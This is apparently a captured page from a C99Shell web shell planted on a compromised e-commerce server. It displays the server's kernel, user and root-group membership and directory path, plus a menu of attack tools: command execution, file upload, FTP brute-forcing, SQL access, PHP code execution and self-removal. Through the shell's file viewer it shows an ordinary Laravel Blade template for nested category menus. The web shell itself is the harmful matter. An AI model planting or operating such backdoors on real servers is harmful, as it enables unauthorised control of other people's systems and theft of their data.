!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/resources/views/admin/layouts/includes/   drwxr-xr-x
Free 26.72 GB of 117.98 GB (22.64%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     child_category.blade.php (1.87 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@if (count($child_category->categories->where('status', 'Active')))
    <li class="-hasSubmenu category-list categorySearchDiv-{{ $catId-1 }}" id="list-{{ $child_category->id }}" data-catId = "{{ $child_category->id }}" data-name = "{{ $child_category->name }}"><a href="javascript:void(0)">{{ wrapIt($child_category->name, 20, ['columns' => 3, 'trim' => true, 'trimLength' => 25]) }}</a>
        <ul>
            <div class="input-group p-2">
                <input class="form-control {{ languageDirection() == 'ltr' ? 'border-end-0' : 'border-start-0' }} border m-border input-height category-search" type="search" placeholder="{{ __('Search') }}" data-seId = "{{ $catId }}">
                <span class="input-group-append input-height">
                        <button class="btn text-secondary bg-white {{ languageDirection() == 'ltr' ? ' border-start-0 rounded-end' : 'border-end-0 rounded-start' }} border ms-n5 input-height" type="button">
                            <div class="icon-height">
                                <i class="fa fa-search"></i>
                            </div>
                        </button>
                    </span>
            </div>
            <div class="custom-overflow" id="categorySearchDiv-{{ $catId++ }}">
                @foreach ($child_category->categories->where('status', 'Active') as $childCategory)
                    @include('../admin/layouts.includes.child_category', ['child_category' => $childCategory, 'catId' => $catId])
                @endforeach
            </div>
        </ul>
    </li>
@else
    <li class="category-list clicked categorySearchDiv-{{ $catId-1 }}" id="list-{{ $child_category->id }}" data-catId = "{{ $child_category->id }}" data-name = "{{ $child_category->name }}"><a href="javascript:void(0)">{{ wrapIt($child_category->name, 20, ['columns' => 3, 'trim' => true, 'trimLength' => 25]) }}</a></li>
@endif

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0046 ]--